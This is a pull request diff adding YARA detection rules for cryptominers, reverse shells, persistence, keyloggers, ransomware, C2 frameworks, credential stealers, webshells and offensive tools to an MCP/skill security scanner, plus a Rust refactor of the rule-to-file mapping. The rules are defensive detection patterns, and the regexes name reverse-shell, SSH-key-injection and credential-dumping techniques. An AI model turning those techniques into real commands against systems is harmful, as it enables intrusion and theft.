### PR TITLE
feat: adopt SkillSpector malware/miner/webshell/hacktool YARA rules

### DIFF
--- a/README.md
+++ b/README.md
@@ -35,7 +35,7 @@ Ramparts provides **security scanning** of the MCP-and-skill ecosystem by:
 
 1. **MCP server discovery & analysis** — scans MCP endpoints for tools/resources/prompts; multi-transport (HTTP, SSE, stdio, subprocess) with intelligent fallback and session management
 2. **Skill scanning** — same threat model applied to agent skill files on disk (Claude Code commands, agentskills.io bundles incl. bundled `scripts/` + `references/`, Cursor / Codex / Windsurf / Gemini variants)
-3. **Static analysis (YARA)** — 25+ pre/post-scan rules across both surfaces, including 9 skill-targeted rules (prompt-injection variants, credential harvesting, tool-chaining exfil, system manipulation, authority abuse)
+3. **Static analysis (YARA)** — 35+ pre/post-scan rules across both surfaces: 9 skill-targeted rules (prompt-injection variants, credential harvesting, tool-chaining exfil, system manipulation, authority abuse) plus malware-IOC rules adapted from [NVIDIA SkillSpector](https://github.com/NVIDIA/SkillSpector) (cryptominers, reverse shells / C2 / info-stealers, webshells, offensive hack tools)
 4. **LLM-powered analysis** — sophisticated semantic issues no static rule can spot (tool descriptions that lie about behavior, sneaky permission requests, etc.)
 5. **Cross-origin analysis** — detects tools spanning multiple domains, a context-hijacking / injection vector
 6. **Supply-chain coverage** — queries OSV.dev for known CVEs in npx/uvx-launched stdio MCP servers

--- a/rules/pre/cryptominers.yar
+++ b/rules/pre/cryptominers.yar
@@ -1,0 +1,126 @@
+/*
+ * Cryptominer Detection
+ * Detects embedded cryptocurrency-mining payloads in MCP tool/skill
+ * content: stratum protocol usage, known mining pools, miner software
+ * references, and browser-based cryptojacking scripts.
+ *
+ * Adapted from NVIDIA SkillSpector (Apache-2.0), itself based on
+ * patterns from Neo23x0/signature-base (DRL 1.1).
+ * https://github.com/NVIDIA/SkillSpector
+ *
+ * FP-hardening vs upstream: dropped the bare "t-rex" miner-software
+ * string (matches ordinary prose); miner-software names still require
+ * 2 distinct matches to fire.
+ */
+
+rule CryptoStratumProtocol
+{
+    meta:
+        name = "Crypto Stratum Protocol"
+        description = "Stratum mining protocol usage (stratum+tcp/ssl, mining.subscribe/authorize)"
+        severity = "HIGH"
+        category = "cryptominer"
+        author = "Ramparts Security Team"
+        version = "1.0"
+        reference = "https://github.com/NVIDIA/SkillSpector"
+
+    strings:
+        $stratum_tcp   = "stratum+tcp://" nocase
+        $stratum_ssl   = "stratum+ssl://" nocase
+        $mining_sub    = "mining.subscribe" nocase
+        $mining_auth   = "mining.authorize" nocase
+        $mining_submit = "mining.submit" nocase
+
+    condition:
+        any of them
+}
+
+rule CryptoMiningPools
+{
+    meta:
+        name = "Crypto Mining Pools"
+        description = "Connection to known cryptocurrency mining pools"
+        severity = "HIGH"
+        category = "cryptominer"
+        author = "Ramparts Security Team"
+        version = "1.0"
+        reference = "https://github.com/NVIDIA/SkillSpector"
+
+    strings:
+        $pool_minexmr    = "pool.minexmr.com" nocase
+        $pool_xmrpool    = "xmrpool.eu" nocase
+        $pool_monero     = "monerohash.com" nocase
+        $pool_supportxmr = "supportxmr.com" nocase
+        $pool_nanopool   = "nanopool.org" nocase
+        $pool_hashvault  = "hashvault.pro" nocase
+        $pool_2miners    = "2miners.com" nocase
+        $pool_herominers = "herominers.com" nocase
+        $pool_unmine     = "unmineable.com" nocase
+        $pool_nicehash   = "nicehash.com" nocase
+        $pool_minergate  = "minergate.com" nocase
+        $pool_f2pool     = "f2pool.com" nocase
+        $pool_antpool    = "antpool.com" nocase
+        $pool_viabtc     = "viabtc.com" nocase
+        $pool_ethermine  = "ethermine.org" nocase
+        $pool_flexpool   = "flexpool.io" nocase
+        $pool_hiveon     = "hiveon.net" nocase
+        $pool_ezil       = "ezil.me" nocase
+
+    condition:
+        any of them
+}
+
+rule CryptoMinerSoftware
+{
+    meta:
+        name = "Crypto Miner Software"
+        description = "References to known cryptocurrency mining software"
+        severity = "HIGH"
+        category = "cryptominer"
+        author = "Ramparts Security Team"
+        version = "1.0"
+        reference = "https://github.com/NVIDIA/SkillSpector"
+
+    strings:
+        $xmrig        = "xmrig" nocase
+        $xmr_stak     = "xmr-stak" nocase
+        $cpuminer     = "cpuminer" nocase
+        $cgminer      = "cgminer" nocase
+        $bfgminer     = "bfgminer" nocase
+        $ethminer     = "ethminer" nocase
+        $nbminer      = "nbminer" nocase
+        $phoenixminer = "phoenixminer" nocase
+        $cryptonight  = "cryptonight" nocase
+        $randomx      = "randomx" nocase
+
+    condition:
+        // Single mentions appear in legitimate crypto documentation;
+        // require two distinct software references.
+        2 of them
+}
+
+rule CryptoCoinjacking
+{
+    meta:
+        name = "Crypto Coinjacking"
+        description = "Browser-based cryptojacking scripts (CoinHive, CryptoLoot, etc.)"
+        severity = "CRITICAL"
+        category = "cryptominer"
+        author = "Ramparts Security Team"
+        version = "1.0"
+        reference = "https://github.com/NVIDIA/SkillSpector"
+
+    strings:
+        $coinhive_js   = "coinhive.min.js" nocase
+        $coinhive_anon = /CoinHive\.Anonymous\s*\(/ nocase
+        $cryptoloot    = "cryptoloot" nocase
+        $webmine_pro   = "webmine.pro" nocase
+        $jsecoin       = "jsecoin" nocase
+        $coin_imp      = "coin-imp" nocase
+        $minero_cc     = "minero.cc" nocase
+        $monerominer   = "monerominer" nocase
+        $wasm_miner    = /WebAssembly\.instantiate.*(mine|hash|crypto)/
+
+    condition:
+        any of them
+}

--- a/rules/pre/hacktools.yar
+++ b/rules/pre/hacktools.yar
@@ -1,0 +1,137 @@
+/*
+ * Hack Tool and Exploit Kit Detection
+ * Detects references to offensive security tools, exploit frameworks,
+ * privilege-escalation utilities, and phishing kits in MCP tool/skill
+ * content. Legitimate agent skills should not invoke these.
+ *
+ * Adapted from NVIDIA SkillSpector (Apache-2.0), itself based on
+ * patterns from Neo23x0/signature-base (DRL 1.1).
+ * https://github.com/NVIDIA/SkillSpector
+ *
+ * FP-hardening vs upstream: command_injection.yar deliberately dropped
+ * bare network-tool mentions (`nmap`, `dig`, ...) as doc-FP-prone, so
+ * the strings here stay flag-qualified (`nmap -sS`, `sqlmap --url`)
+ * wherever possible. The bare `BloodHound` string was tightened to
+ * tool-specific forms (BloodHound.py / bloodhound-python / SharpHound).
+ */
+
+rule OffensiveToolReferences
+{
+    meta:
+        name = "Offensive Tool References"
+        description = "Invocations of well-known offensive security tools"
+        severity = "HIGH"
+        category = "hack-tool"
+        author = "Ramparts Security Team"
+        version = "1.0"
+        reference = "https://github.com/NVIDIA/SkillSpector"
+
+    strings:
+        $nmap_scan    = /nmap\s+-[sSUAOPpT]/ nocase
+        $sqlmap       = /sqlmap.*(--url|--dbs|--dump)/ nocase
+        $nikto        = /nikto\s+-h/ nocase
+        $hydra        = /hydra\s+.*-[lLP]/ nocase
+        $john         = /john\s+.*--wordlist/ nocase
+        $hashcat      = /hashcat\s+-[mao]/ nocase
+        $burp_collab  = "BurpCollaborator" nocase
+        $responder    = /Responder\.py/ nocase
+        $bloodhound   = /(SharpHound|BloodHound\.py|bloodhound-python)/ nocase
+        $crackmapexec = /crackmapexec|cme\s+smb/ nocase
+        $impacket     = /impacket.*(smbclient|psexec|wmiexec|secretsdump)/ nocase
+
+    condition:
+        any of them
+}
+
+rule NetworkReconnaissance
+{
+    meta:
+        name = "Network Reconnaissance"
+        description = "Network reconnaissance and scanning patterns"
+        severity = "MEDIUM"
+        category = "hack-tool"
+        author = "Ramparts Security Team"
+        version = "1.0"
+        reference = "https://github.com/NVIDIA/SkillSpector"
+
+    strings:
+        $port_scan  = /for\s+.*\s+in\s+range\s*\(\s*\d+\s*,\s*\d{4,}\s*\).*connect/ nocase
+        $masscan    = /masscan\s+.*-p/ nocase
+        $arp_scan   = /arp-scan\s+--/ nocase
+        $enum4linux = /enum4linux/ nocase
+        $snmp_walk  = /snmpwalk\s+-/ nocase
+        $dns_enum   = /(dnsenum|dnsrecon|fierce)/ nocase
+
+    condition:
+        any of them
+}
+
+rule PrivilegeEscalationTools
+{
+    meta:
+        name = "Privilege Escalation Tools"
+        description = "Privilege escalation tools and techniques"
+        severity = "HIGH"
+        category = "hack-tool"
+        author = "Ramparts Security Team"
+        version = "1.0"
+        reference = "https://github.com/NVIDIA/SkillSpector"
+
+    strings:
+        $linpeas       = "linpeas" nocase
+        $winpeas       = "winpeas" nocase
+        $pspy          = /\bpspy(32|64)?\b/ nocase
+        $linux_exploit = /(Linux_Exploit_Suggester|linux-exploit-suggester)/ nocase
+        $potato        = /(JuicyPotato|RottenPotato|SweetPotato|PrintSpoofer)/ nocase
+        $dirty_pipe    = "DirtyPipe" nocase
+        $dirty_cow     = "dirtycow" nocase
+        $suid_exploit  = /find\s+\/\s+-perm\s+-4000/ nocase
+
+    condition:
+        any of them
+}
+
+rule ExploitFramework
+{
+    meta:
+        name = "Exploit Framework"
+        description = "Exploit framework components and payloads"
+        severity = "HIGH"
+        category = "exploit"
+        author = "Ramparts Security Team"
+        version = "1.0"
+        reference = "https://github.com/NVIDIA/SkillSpector"
+
+    strings:
+        $msf_payload   = /msfvenom.*-p\s+/ nocase
+        $msf_console   = /msfconsole.*-x/ nocase
+        $beef_hook     = /hook\.js.*BeEF/ nocase
+        $set_toolkit   = /(setoolkit|Social-Engineer)/ nocase
+        $pwntools      = /from\s+pwn\s+import/ nocase
+        $rop_chain     = /ROP\s*\(.*elf\)/ nocase
+        $shellcode_gen = /shellcode.*\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}/ nocase
+
+    condition:
+        any of them
+}
+
+rule PhishingKit
+{
+    meta:
+        name = "Phishing Kit"
+        description = "Phishing kit indicators in source code"
+        severity = "HIGH"
+        category = "hack-tool"
+        author = "Ramparts Security Team"
+        version = "1.0"
+        reference = "https://github.com/NVIDIA/SkillSpector"
+
+    strings:
+        $phish_form   = /<form.*action=.*(login|signin|verify).*method.*post/ nocase
+        $cred_harvest = /(password|passwd|credential).*(file_put_contents|fwrite|>>)/ nocase
+        $email_exfil  = /mail\s*\(.*(password|credential|login)/ nocase
+        $telegram_bot = /api\.telegram\.org\/bot.*(password|credential|login)/ nocase
+
+    condition:
+        2 of them
+}

--- a/rules/pre/hacktools.yar
+++ b/rules/pre/hacktools.yar
@@ -27,7 +27,6 @@ rule OffensiveToolReferences
         reference = "https://github.com/NVIDIA/SkillSpector"
 
     strings:
-        $nmap_scan    = /nmap\s+-[sSUAOPpT]/ nocase
         $sqlmap       = /sqlmap.*(--url|--dbs|--dump)/ nocase
         $nikto        = /nikto\s+-h/ nocase
         $hydra        = /hydra\s+.*-[lLP]/ nocase
@@ -55,6 +54,8 @@ rule NetworkReconnaissance
         reference = "https://github.com/NVIDIA/SkillSpector"
 
     strings:
+        // nmap is a legitimate scanner, not solely offensive — recon, not hack-tool.
+        $nmap_scan  = /nmap\s+-[sSUAOPpT]/ nocase
         $port_scan  = /for\s+.*\s+in\s+range\s*\(\s*\d+\s*,\s*\d{4,}\s*\).*connect/ nocase
         $masscan    = /masscan\s+.*-p/ nocase
         $arp_scan   = /arp-scan\s+--/ nocase

--- a/rules/pre/malware.yar
+++ b/rules/pre/malware.yar
@@ -1,0 +1,163 @@
+/*
+ * Malware Indicator Detection
+ * Detects classic malware behavior embedded in MCP tool/skill content:
+ * reverse shells, backdoor persistence, keyloggers, ransomware-like
+ * behavior, C2 framework indicators, and information stealers.
+ *
+ * Adapted from NVIDIA SkillSpector (Apache-2.0), itself based on
+ * patterns from Neo23x0/signature-base (DRL 1.1).
+ * https://github.com/NVIDIA/SkillSpector
+ *
+ * De-dupe vs existing ramparts rules:
+ *   - `bash -i >&` and `nc -e` reverse-shell variants are already
+ *     covered by command_injection.yar ($reverse_shell); ReverseShell
+ *     below carries only the variants that rule misses (ncat, socat,
+ *     mkfifo, python/perl/php/ruby/powershell sockets).
+ *   - The upstream LD_PRELOAD string was dropped — loader hijack is
+ *     covered more precisely by skill_system_manipulation.yar
+ *     ($loader_preload).
+ *   - The upstream bare `Cookies.*(chrome|firefox|...)` string was
+ *     dropped from InfoStealer (browser-automation skills mention
+ *     cookies + browser names legitimately).
+ */
+
+rule ReverseShell
+{
+    meta:
+        name = "Reverse Shell"
+        description = "Reverse shell patterns in scripts or source code"
+        severity = "CRITICAL"
+        category = "malware"
+        author = "Ramparts Security Team"
+        version = "1.0"
+        reference = "https://github.com/NVIDIA/SkillSpector"
+
+    strings:
+        $ncat_shell       = /ncat\s.*-e\s*\/bin\/(ba)?sh/ nocase
+        $python_socket    = /socket\.socket\(.*SOCK_STREAM.*\.connect\(/
+        $perl_socket      = /use\s+Socket;.*socket\s*\(\s*SOCK/
+        $php_fsock        = /fsockopen\s*\(.*exec\s*\(/ nocase
+        $ruby_tcpsocket   = /TCPSocket\.\s*new\s*\(.*exec\s*\(/
+        $powershell_tcp   = /New-Object\s+System\.Net\.Sockets\.TCPClient/ nocase
+        $socat_shell      = /socat\s+.*EXEC.*\/bin\/(ba)?sh/ nocase
+        $mkfifo_shell     = /mkfifo\s+.*\|\s*\/bin\/(ba)?sh/
+
+    condition:
+        any of them
+}
+
+rule BackdoorPersistence
+{
+    meta:
+        name = "Backdoor Persistence"
+        description = "Backdoor persistence with malicious payloads (shell commands, SSH key injection, hidden root users)"
+        severity = "HIGH"
+        category = "malware"
+        author = "Ramparts Security Team"
+        version = "1.0"
+        reference = "https://github.com/NVIDIA/SkillSpector"
+
+    strings:
+        $hidden_user     = /useradd\s+.*-o\s+-u\s+0/ nocase
+        $cron_persist    = /crontab\s.*(curl|wget|nc|bash|python)/ nocase
+        $ssh_inject      = /echo\s+.*>>?\s*.*\.ssh\/authorized_keys/ nocase
+        $systemd_persist = /\[Service\].*ExecStart.*(nc|bash|python|curl)/ nocase
+        $bashrc_persist  = /echo\s+.*>>?\s*.*\.bashrc/ nocase
+        $profile_persist = /echo\s+.*>>?\s*.*\.profile/ nocase
+        $init_persist    = /\/etc\/init\.d\/.*(nc|bash|reverse)/ nocase
+
+    condition:
+        any of them
+}
+
+rule KeyloggerIndicators
+{
+    meta:
+        name = "Keylogger Indicators"
+        description = "Keylogger functionality in scripts or source code"
+        severity = "HIGH"
+        category = "malware"
+        author = "Ramparts Security Team"
+        version = "1.0"
+        reference = "https://github.com/NVIDIA/SkillSpector"
+
+    strings:
+        $pynput        = /from\s+pynput\.keyboard\s+import/ nocase
+        $keyboard_hook = /keyboard\.(on_press|hook|on_release)/ nocase
+        $xinput_test   = /xinput\s+test/ nocase
+        $logkeys       = /logkeys\s+--start/ nocase
+        $keybd_event   = /(GetAsyncKeyState|SetWindowsHookEx.*WH_KEYBOARD)/ nocase
+
+    condition:
+        any of them
+}
+
+rule RansomwareBehavior
+{
+    meta:
+        name = "Ransomware Behavior"
+        description = "Ransomware-like patterns (mass encryption, ransom notes)"
+        severity = "CRITICAL"
+        category = "malware"
+        author = "Ramparts Security Team"
+        version = "1.0"
+        reference = "https://github.com/NVIDIA/SkillSpector"
+
+    strings:
+        $walk_encrypt   = /os\.walk\s*\(.*\.(encrypt|cipher)/
+        $ransom_note    = /(your\s+files\s+(have\s+been|are)\s+encrypted|pay\s+.*bitcoin|send\s+.*btc)/ nocase
+        $ext_rename     = /os\.rename\s*\(.*\+\s*['"]\.(locked|encrypted|crypt|enc)['"]\s*\)/
+        $mass_overwrite = /os\.walk\s*\(.*open\s*\(.*['"]wb['"]\)/
+
+    condition:
+        any of them
+}
+
+rule C2FrameworkIndicators
+{
+    meta:
+        name = "C2 Framework Indicators"
+        description = "Command-and-control framework indicators (Cobalt Strike, Metasploit, Sliver, etc.)"
+        severity = "CRITICAL"
+        category = "malware"
+        author = "Ramparts Security Team"
+        version = "1.0"
+        reference = "https://github.com/NVIDIA/SkillSpector"
+
+    strings:
+        $cobalt_strike = "cobaltstrike" nocase
+        $meterpreter   = "meterpreter" nocase
+        $metasploit    = /metasploit.*(payload|exploit|stager)/ nocase
+        $empire        = /powershell.*empire/ nocase
+        $sliver_c2     = /sliver.*(implant|beacon|session)/ nocase
+        $covenant      = /Covenant.*(Grunt|Listener)/ nocase
+        $havoc_c2      = /havoc.*(demon|teamserver)/ nocase
+        $beacon_config = /(BeaconType|C2Server|PublicKey.*watermark)/ nocase
+
+    condition:
+        any of them
+}
+
+rule InfoStealer
+{
+    meta:
+        name = "Info Stealer"
+        description = "Information stealer patterns (credential harvesting, browser data theft)"
+        severity = "HIGH"
+        category = "malware"
+        author = "Ramparts Security Team"
+        version = "1.0"
+        reference = "https://github.com/NVIDIA/SkillSpector"
+
+    strings:
+        $chrome_login   = /Chrome.*Login\s*Data/ nocase
+        $firefox_logins = /logins\.json.*firefox/ nocase
+        $wallet_steal   = "wallet.dat" nocase
+        $mimikatz       = "mimikatz" nocase
+        $lazagne        = "lazagne" nocase
+        $cred_dump_sam  = /reg\s+save\s+.*\\sam/ nocase
+        $ntds_dump      = /ntds\.dit/ nocase
+
+    condition:
+        any of them
+}

--- a/rules/pre/webshells.yar
+++ b/rules/pre/webshells.yar
@@ -1,0 +1,151 @@
+/*
+ * Webshell Detection
+ * Detects webshell code embedded in MCP tool/skill content: PHP
+ * eval/exec on request input, obfuscated PHP loaders, known webshell
+ * families, and Python/JSP/ASPX command-execution shells.
+ *
+ * Adapted from NVIDIA SkillSpector (Apache-2.0), itself based on
+ * patterns from Neo23x0/signature-base (DRL 1.1).
+ * https://github.com/NVIDIA/SkillSpector
+ *
+ * Note: command_injection.yar's $web_shell only matches language-flag
+ * invocations (`php -r`, `python -c`, ...) — these rules cover actual
+ * webshell signatures, so there is no overlap.
+ */
+
+rule PHPWebshellGeneric
+{
+    meta:
+        name = "PHP Webshell Generic"
+        description = "Generic PHP webshell — eval/assert/exec on user-controlled request input"
+        severity = "CRITICAL"
+        category = "webshell"
+        author = "Ramparts Security Team"
+        version = "1.0"
+        reference = "https://github.com/NVIDIA/SkillSpector"
+
+    strings:
+        $eval_post     = /eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\s*\[/ nocase
+        $assert_post   = /assert\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\s*\[/ nocase
+        $system_post   = /system\s*\(\s*\$_(POST|GET|REQUEST)\s*\[/ nocase
+        $passthru_post = /passthru\s*\(\s*\$_(POST|GET|REQUEST)\s*\[/ nocase
+        $exec_post     = /shell_exec\s*\(\s*\$_(POST|GET|REQUEST)\s*\[/ nocase
+        $popen_post    = /popen\s*\(\s*\$_(POST|GET|REQUEST)\s*\[/ nocase
+        $proc_open     = /proc_open\s*\(\s*\$_(POST|GET|REQUEST)\s*\[/ nocase
+
+    condition:
+        any of them
+}
+
+rule PHPWebshellObfuscated
+{
+    meta:
+        name = "PHP Webshell Obfuscated"
+        description = "Obfuscated PHP webshell — eval(base64_decode/gzinflate/str_rot13)"
+        severity = "CRITICAL"
+        category = "webshell"
+        author = "Ramparts Security Team"
+        version = "1.0"
+        reference = "https://github.com/NVIDIA/SkillSpector"
+
+    strings:
+        $b64_eval       = /eval\s*\(\s*base64_decode\s*\(/ nocase
+        $gz_eval        = /eval\s*\(\s*gzinflate\s*\(\s*base64_decode/ nocase
+        $rot13_eval     = /eval\s*\(\s*str_rot13\s*\(/ nocase
+        $gzuncompress   = /eval\s*\(\s*gzuncompress\s*\(/ nocase
+        $preg_replace_e = /preg_replace\s*\(\s*['"]\/.*\/e['"]/ nocase
+        $create_func    = /create_function\s*\(\s*['"][^'"]*['"]\s*,\s*\$/ nocase
+
+    condition:
+        any of them
+}
+
+rule PHPWebshellKnown
+{
+    meta:
+        name = "PHP Webshell Known Families"
+        description = "Known PHP webshell families (c99, r57, b374k, WSO, etc.)"
+        severity = "CRITICAL"
+        category = "webshell"
+        author = "Ramparts Security Team"
+        version = "1.0"
+        reference = "https://github.com/NVIDIA/SkillSpector"
+
+    strings:
+        $c99           = "c99shell" nocase
+        $c99v2         = "c99_sess_put" nocase
+        $r57           = "r57shell" nocase
+        $wso           = "Web Shell by oRb" nocase
+        $b374k         = "b374k" nocase
+        $alfa          = "STARTER ALFA" nocase
+        $weevely       = "weevely" nocase
+        $p0wny         = "p0wny" nocase
+        $antsword      = "antSword" nocase
+        $behinder      = "behinder" nocase
+        $godzilla      = "GodzillaShell" nocase
+        $china_chopper = "China Chopper" nocase
+
+    condition:
+        any of them
+}
+
+rule PythonWebshell
+{
+    meta:
+        name = "Python Webshell"
+        description = "Python webshell — exec/eval/os.popen on request input"
+        severity = "HIGH"
+        category = "webshell"
+        author = "Ramparts Security Team"
+        version = "1.0"
+        reference = "https://github.com/NVIDIA/SkillSpector"
+
+    strings:
+        $exec_request     = /exec\s*\(\s*request\./ nocase
+        $eval_request     = /eval\s*\(\s*request\./ nocase
+        $os_popen_request = /os\.popen\s*\(\s*request\./ nocase
+        $subprocess_req   = /subprocess\.[a-zA-Z0-9_]+\s*\(\s*request\./ nocase
+        $os_system_req    = /os\.system\s*\(\s*request\./ nocase
+        $flask_cmd_exec   = /os\.(system|popen)\s*\(\s*request\.(args|form|data|json)/ nocase
+
+    condition:
+        any of them
+}
+
+rule JSPWebshell
+{
+    meta:
+        name = "JSP Webshell"
+        description = "JSP webshell — Runtime.exec on request parameter"
+        severity = "HIGH"
+        category = "webshell"
+        author = "Ramparts Security Team"
+        version = "1.0"
+        reference = "https://github.com/NVIDIA/SkillSpector"
+
+    strings:
+        $runtime_exec   = /Runtime\.getRuntime\(\)\.exec\s*\(\s*request\.getParameter/ nocase
+        $processbuilder = /ProcessBuilder\s*\(.*request\.getParameter/ nocase
+
+    condition:
+        any of them
+}
+
+rule ASPXWebshell
+{
+    meta:
+        name = "ASPX Webshell"
+        description = "ASPX webshell — Process.Start on Request input"
+        severity = "HIGH"
+        category = "webshell"
+        author = "Ramparts Security Team"
+        version = "1.0"
+        reference = "https://github.com/NVIDIA/SkillSpector"
+
+    strings:
+        $process_start = /Process\.Start\s*\(.*Request\[/ nocase
+        $cmd_request   = /cmd\.exe.*Request\./ nocase
+
+    condition:
+        any of them
+}

--- a/src/scanner.rs
+++ b/src/scanner.rs
@@ -28,43 +28,6 @@ type YaraRules = Rules;
 #[cfg(not(feature = "yara-x-scanning"))]
 type YaraRules = ();
 
-/// Map rule names to their file names for consistent naming
-fn rule_name_to_file_name(rule_name: &str) -> Option<String> {
-    match rule_name {
-        // secrets_leakage.yar rules
-        "SecretsLeakage" | "SSHKeyExposure" | "PEMFileAccess" | "EnvironmentVariableLeakage" => {
-            Some("secrets_leakage".to_string())
-        }
-        // cross_origin_escalation.yar rules
-        "CrossOriginEscalation"
-        | "CrossDomainContamination"
-        | "DomainOutlier"
-        | "MixedSecuritySchemes" => Some("cross_origin_escalation".to_string()),
-        // skill_prompt_injection.yar rules
-        "PromptInjectionSignature"
-        | "UnicodeSteganography"
-        | "CoerciveInjection"
-        | "IndirectPromptInjection" => Some("skill_prompt_injection".to_string()),
-        // skill_authority.yar rules
-        "AutonomyAbuse" | "CapabilityInflation" => Some("skill_authority".to_string()),
-        // skill_credential_harvesting.yar
-        "SkillCredentialHarvesting" => Some("skill_credential_harvesting".to_string()),
-        // skill_tool_chaining_abuse.yar
-        "SkillToolChainingExfiltration" => Some("skill_tool_chaining_abuse".to_string()),
-        // skill_system_manipulation.yar
-        "SkillSystemManipulation" => Some("skill_system_manipulation".to_string()),
-        // NOTE: agentskills.io validation findings (AgentskillsNameMismatch,
-        // AgentskillsInvalidName, AgentskillsMissingName,
-        // AgentskillsUnknownFrontmatterField) are NOT mapped here. They're
-        // synthesized in `src/skills.rs::make_heuristic_finding`, which
-        // hard-codes `rule_file = "skill_parser"` on construction; this
-        // mapping is only consulted for YARA-scan results, so any entry
-        // would be dead code. Same goes for the other skill heuristics
-        // (OverbroadAllowedTools, VagueSkillTrigger, etc.).
-        _ => None,
-    }
-}
-
 /// Generate descriptive context messages based on rule names
 fn generate_context_message(item_type: &str, rule_name: &str) -> String {
     match rule_name {
@@ -248,6 +211,10 @@ pub struct ThreatRules {
     post_scan_rules: Vec<Arc<YaraRules>>,
     rules_dir: String,
     rule_metadata: HashMap<String, RuleMetadata>,
+    /// YARA rule identifier → file stem of the .yar file it was loaded
+    /// from. Built at load time so new rule files dropped into
+    /// `rules/pre` or `rules/post` are mapped with no code changes.
+    rule_file_map: HashMap<String, String>,
     memory_usage_bytes: usize,
     last_load_time: std::time::Instant,
 }
@@ -285,6 +252,7 @@ impl ThreatRules {
             post_scan_rules: Vec::new(),
             rules_dir: rules_dir.to_string(),
             rule_metadata: HashMap::new(),
+            rule_file_map: HashMap::new(),
             memory_usage_bytes: 0,
             last_load_time: start_time,
         }
@@ -299,6 +267,7 @@ impl ThreatRules {
             post_scan_rules: Vec::new(),
             rules_dir: rules_dir.to_string(),
             rule_metadata: HashMap::new(),
+            rule_file_map: HashMap::new(),
             memory_usage_bytes: 0,
             last_load_time: start_time,
         };
@@ -398,6 +367,14 @@ impl ThreatRules {
                             .and_then(|s| s.to_str())
                             .unwrap_or("unknown")
                             .to_string();
+
+                        // Record which file each compiled rule identifier came
+                        // from so scan results can report their rule_file
+                        // without a hand-maintained name table.
+                        for compiled_rule in rule.iter() {
+                            self.rule_file_map
+                                .insert(compiled_rule.identifier().to_string(), rule_name.clone());
+                        }
 
                         debug!("Loaded YARA-X rule: {} (phase: {})", path.display(), phase);
 
@@ -529,6 +506,19 @@ impl ThreatRules {
         Self::scan_with_rules_enhanced_internal(text, context, &self.post_scan_rules, "post")
     }
 
+    /// Maps a YARA rule identifier (yara-x's `Rule::identifier`) back to
+    /// the file stem of the .yar file it was loaded from. The map is built
+    /// at load time from the compiled rules, so any rule file dropped into
+    /// the rules directory is covered with no code changes.
+    ///
+    /// NOTE: synthetic findings (skill-parser heuristics like
+    /// `AgentskillsNameMismatch`, the baseline-diff `MCPConfigChanged`,
+    /// OSV's `VulnerableDependency`) never consult this — they hard-code
+    /// `rule_file` on construction.
+    pub fn rule_file_for(&self, rule_identifier: &str) -> Option<String> {
+        self.rule_file_map.get(rule_identifier).cloned()
+    }
+
     /// Gets statistics about loaded rules
     pub fn stats(&self) -> RuleStats {
         let mut pre_scan_rules = Vec::new();
@@ -608,6 +598,7 @@ impl Clone for ThreatRules {
             post_scan_rules: self.post_scan_rules.clone(),
             rules_dir: self.rules_dir.clone(),
             rule_metadata: self.rule_metadata.clone(),
+            rule_file_map: self.rule_file_map.clone(),
             memory_usage_bytes: self.memory_usage_bytes,
             last_load_time: self.last_load_time,
         }
@@ -658,8 +649,7 @@ impl YaraScanner {
 
                 // Store YARA results for each match with metadata
                 for match_info in enhanced_matches {
-                    let yara_result =
-                        Self::create_yara_result_with_metadata::<T>(item, &match_info);
+                    let yara_result = self.create_yara_result_with_metadata::<T>(item, &match_info);
                     results.push(yara_result);
                 }
             }
@@ -682,7 +672,11 @@ impl YaraScanner {
     }
 
     /// Create a YARA scan result with original rule metadata
-    fn create_yara_result_with_metadata<T>(item: &T, match_info: &YaraMatchInfo) -> YaraScanResult
+    fn create_yara_result_with_metadata<T>(
+        &self,
+        item: &T,
+        match_info: &YaraMatchInfo,
+    ) -> YaraScanResult
     where
         T: crate::security::BatchScannableItem,
     {
@@ -690,7 +684,7 @@ impl YaraScanner {
             target_type: T::item_type().to_string(),
             target_name: item.name().to_string(),
             rule_name: match_info.rule_name.clone(),
-            rule_file: rule_name_to_file_name(&match_info.rule_name),
+            rule_file: self.scanner.rule_file_for(&match_info.rule_name),
             matched_text: None,
             context: generate_context_message(T::item_type(), &match_info.rule_name),
             rule_metadata: match_info.metadata.clone(),
@@ -741,7 +735,7 @@ impl Scanner for YaraScanner {
                 for result in &tool_results {
                     triggered_rules.insert(result.rule_name.clone());
                     // Map YARA rule name back to file name for consistent comparison
-                    if let Some(file_name) = rule_name_to_file_name(&result.rule_name) {
+                    if let Some(file_name) = self.scanner.rule_file_for(&result.rule_name) {
                         triggered_file_names.insert(file_name);
                     } else {
                         // Fallback: use the rule name itself if no mapping found
@@ -750,7 +744,7 @@ impl Scanner for YaraScanner {
                 }
                 for result in &prompt_results {
                     triggered_rules.insert(result.rule_name.clone());
-                    if let Some(file_name) = rule_name_to_file_name(&result.rule_name) {
+                    if let Some(file_name) = self.scanner.rule_file_for(&result.rule_name) {
                         triggered_file_names.insert(file_name);
                     } else {
                         triggered_file_names.insert(result.rule_name.clone());
@@ -758,7 +752,7 @@ impl Scanner for YaraScanner {
                 }
                 for result in &resource_results {
                     triggered_rules.insert(result.rule_name.clone());
-                    if let Some(file_name) = rule_name_to_file_name(&result.rule_name) {
+                    if let Some(file_name) = self.scanner.rule_file_for(&result.rule_name) {
                         triggered_file_names.insert(file_name);
                     } else {
                         triggered_file_names.insert(result.rule_name.clone());
@@ -801,7 +795,7 @@ impl Scanner for YaraScanner {
                             .into_iter()
                             .map(|rule_name| {
                                 // Get the file name for this rule
-                                if let Some(file_name) = rule_name_to_file_name(&rule_name) {
+                                if let Some(file_name) = self.scanner.rule_file_for(&rule_name) {
                                     format!("{file_name}:{rule_name}")
                                 } else {
                                     rule_name
@@ -846,7 +840,7 @@ impl Scanner for YaraScanner {
 
                 for result in &tool_results {
                     triggered_rules.insert(result.rule_name.clone());
-                    if let Some(file_name) = rule_name_to_file_name(&result.rule_name) {
+                    if let Some(file_name) = self.scanner.rule_file_for(&result.rule_name) {
                         triggered_file_names.insert(file_name);
                     } else {
                         triggered_file_names.insert(result.rule_name.clone());
@@ -854,7 +848,7 @@ impl Scanner for YaraScanner {
                 }
                 for result in &prompt_results {
                     triggered_rules.insert(result.rule_name.clone());
-                    if let Some(file_name) = rule_name_to_file_name(&result.rule_name) {
+                    if let Some(file_name) = self.scanner.rule_file_for(&result.rule_name) {
                         triggered_file_names.insert(file_name);
                     } else {
                         triggered_file_names.insert(result.rule_name.clone());
@@ -862,7 +856,7 @@ impl Scanner for YaraScanner {
                 }
